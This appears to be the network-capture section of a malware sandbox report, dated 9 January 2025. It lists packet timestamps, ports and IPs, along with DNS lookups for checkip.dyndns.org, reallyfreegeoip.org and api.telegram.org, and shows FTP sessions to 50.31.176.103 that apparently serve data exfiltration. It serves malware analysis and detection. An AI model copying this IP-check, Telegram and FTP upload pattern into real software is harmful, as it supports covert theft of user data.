                                                                                                                                          Jan 9, 2025 16:36:09.381845951 CET4975280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:09.386569977 CET8049752193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.768116951 CET8049751193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.769608021 CET49753443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:09.769653082 CET44349753104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.769717932 CET49753443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:09.769972086 CET49753443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:09.769988060 CET44349753104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.820610046 CET4975180192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:09.846118927 CET8049752193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.847543955 CET49754443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:09.847600937 CET44349754104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.847767115 CET49754443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:09.848031998 CET49754443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:09.848050117 CET44349754104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:09.898741007 CET4975280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.236143112 CET44349753104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.237696886 CET49753443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.237725973 CET44349753104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.310477972 CET44349754104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.312618017 CET49754443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.312655926 CET44349754104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.374449015 CET44349753104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.374504089 CET44349753104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.374572992 CET49753443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.375055075 CET49753443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.378694057 CET4975180192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.379697084 CET4975580192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.383984089 CET8049751193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.384057999 CET4975180192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.384510040 CET8049755193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.384573936 CET4975580192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.384701014 CET4975580192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.389432907 CET8049755193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.464821100 CET44349754104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.464966059 CET44349754104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.465599060 CET49754443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.465599060 CET49754443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.468620062 CET4975280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.469404936 CET4975680192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.473742962 CET8049752193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.473824978 CET4975280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.474298000 CET8049756193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.474383116 CET4975680192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.474456072 CET4975680192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.479291916 CET8049756193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.866734028 CET8049755193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.868639946 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.868699074 CET44349757104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.869371891 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.869659901 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.869674921 CET44349757104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.914361000 CET4975580192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:10.967573881 CET8049756193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.969794035 CET49758443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.969845057 CET44349758104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:10.969906092 CET49758443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.970139980 CET49758443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:10.970149040 CET44349758104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.023756027 CET4975680192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.328978062 CET44349757104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.383121014 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.458039999 CET44349758104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.489483118 CET49758443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.489533901 CET44349758104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.543287992 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.543378115 CET44349757104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.612966061 CET44349758104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.613132000 CET44349758104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.613187075 CET49758443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.613959074 CET49758443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.633977890 CET4975680192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.635119915 CET4975980192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.639036894 CET8049756193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.639089108 CET4975680192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.639974117 CET8049759193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.640022993 CET4975980192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.640180111 CET4975980192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.644974947 CET8049759193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.674565077 CET44349757104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.674730062 CET44349757104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.674798012 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.675059080 CET49757443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:11.678786993 CET4975580192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.679600954 CET4976080192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.683883905 CET8049755193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.683938026 CET4975580192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.684439898 CET8049760193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:11.684499979 CET4976080192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.684587002 CET4976080192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:11.689376116 CET8049760193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.117563963 CET8049759193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.118674040 CET49761443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.118731976 CET44349761104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.118796110 CET49761443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.119040966 CET49761443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.119051933 CET44349761104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.156908989 CET8049760193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.158198118 CET49762443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.158252001 CET44349762104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.159146070 CET49762443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.159406900 CET49762443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.159420967 CET44349762104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.164366007 CET4975980192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.211235046 CET4976080192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.573462963 CET44349761104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.575005054 CET49761443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.575054884 CET44349761104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.615300894 CET44349762104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.616906881 CET49762443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.616929054 CET44349762104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.798253059 CET44349761104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.798320055 CET44349761104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.798465967 CET49761443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.799072981 CET49761443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.860730886 CET4975980192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.866080999 CET8049759193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.866519928 CET4975980192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.868619919 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:12.868650913 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.868747950 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:12.869302988 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:12.869316101 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.903176069 CET44349762104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.903249025 CET44349762104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.903508902 CET49762443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.903805017 CET49762443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:12.907330990 CET4976080192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.908607006 CET4976480192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.912218094 CET8049760193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.912275076 CET4976080192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.913372040 CET8049764193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.913435936 CET4976480192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.913570881 CET4976480192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:12.918289900 CET8049764193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.371639013 CET8049764193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.372699022 CET49766443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:13.372765064 CET44349766104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.372843027 CET49766443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:13.373117924 CET49766443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:13.373136997 CET44349766104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.411420107 CET4976480192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:13.487251043 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.487366915 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:13.491009951 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:13.491023064 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.491276026 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.492810011 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:13.535327911 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.730673075 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.730745077 CET44349763149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.730793953 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:13.736422062 CET49763443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:13.850512028 CET44349766104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.852247953 CET49766443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:13.852276087 CET44349766104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.987179041 CET44349766104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.987370014 CET44349766104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:13.987471104 CET49766443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:14.057065964 CET49766443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:14.236321926 CET4976480192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:14.236639977 CET4976780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:14.241588116 CET8049767193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:14.241612911 CET8049764193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:14.241684914 CET4976480192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:14.241693020 CET4976780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:14.242419004 CET4976780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:14.247355938 CET8049767193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:14.719979048 CET8049767193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:14.723402977 CET49769443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:14.723445892 CET44349769104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:14.723526001 CET49769443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:14.723819017 CET49769443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:14.723836899 CET44349769104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:14.773751020 CET4976780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:15.200236082 CET44349769104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:15.202142954 CET49769443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:15.202169895 CET44349769104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:15.340081930 CET44349769104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:15.340172052 CET44349769104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:15.340219021 CET49769443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:15.340727091 CET49769443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:15.343828917 CET4976780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:15.344969988 CET4977280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:15.348922014 CET8049767193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:15.348990917 CET4976780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:15.349798918 CET8049772193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:15.349877119 CET4977280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:15.349977970 CET4977280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:15.354793072 CET8049772193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.082178116 CET8049772193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.086087942 CET49774443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:16.086154938 CET44349774104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.086267948 CET49774443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:16.086798906 CET49774443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:16.086836100 CET44349774104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.133148909 CET4977280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:16.561492920 CET44349774104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.574947119 CET49774443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:16.575042009 CET44349774104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.703396082 CET44349774104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.703473091 CET44349774104.21.16.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.703562021 CET49774443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:16.704195023 CET49774443192.168.2.4104.21.16.1
                                                                                                                                          Jan 9, 2025 16:36:16.715459108 CET4977280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:16.716322899 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:16.716351986 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.716681957 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:16.717164040 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:16.717179060 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.720386028 CET8049772193.122.130.0192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:16.720443010 CET4977280192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:17.383668900 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:17.383754015 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:17.385561943 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:17.385574102 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:17.385974884 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:17.388111115 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:17.431341887 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:17.745168924 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:17.745251894 CET44349775149.154.167.220192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:17.745337009 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:17.748466015 CET49775443192.168.2.4149.154.167.220
                                                                                                                                          Jan 9, 2025 16:36:27.068003893 CET4974180192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:27.130376101 CET4974780192.168.2.4193.122.130.0
                                                                                                                                          Jan 9, 2025 16:36:27.181751013 CET4977721192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.185859919 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.186706066 CET214977750.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:27.186791897 CET4977721192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.190831900 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:27.190903902 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.279165983 CET4977721192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.284997940 CET214977750.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:27.285084009 CET4977721192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.697698116 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:27.697879076 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.702683926 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:27.816128969 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:27.816339016 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:27.821218967 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.082225084 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.082417011 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.087299109 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.200855017 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.206984043 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.211869955 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.325298071 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.326448917 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.331290007 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.444933891 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.445205927 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.450018883 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.563643932 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.572880030 CET4977932059192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.577816010 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.577896118 CET4977932059192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.577986956 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.582773924 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.984383106 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.984699965 CET4977932059192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.984766960 CET4977932059192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:28.989537954 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.989587069 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.989600897 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.989717007 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.989743948 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.989861012 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.990093946 CET320594977950.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:28.990159988 CET4977932059192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:29.039405107 CET4977821192.168.2.450.31.176.103
                                                                                                                                          Jan 9, 2025 16:36:29.113235950 CET214977850.31.176.103192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:29.164499998 CET4977821192.168.2.450.31.176.103
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 9, 2025 16:36:00.934256077 CET5239953192.168.2.41.1.1.1
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET53523991.1.1.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:01.594521999 CET5646553192.168.2.41.1.1.1
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET53564651.1.1.1192.168.2.4
                                                                                                                                          Jan 9, 2025 16:36:12.861273050 CET5583353192.168.2.41.1.1.1
                                                                                                                                          Jan 9, 2025 16:36:12.867985964 CET53558331.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 9, 2025 16:36:00.934256077 CET192.168.2.41.1.1.10x9de6Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.594521999 CET192.168.2.41.1.1.10xc852Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:12.861273050 CET192.168.2.41.1.1.10x8621Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET1.1.1.1192.168.2.40x9de6No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET1.1.1.1192.168.2.40x9de6No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET1.1.1.1192.168.2.40x9de6No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET1.1.1.1192.168.2.40x9de6No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET1.1.1.1192.168.2.40x9de6No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:00.941251993 CET1.1.1.1192.168.2.40x9de6No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                          Jan 9, 2025 16:36:01.602710962 CET1.1.1.1192.168.2.40xc852No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
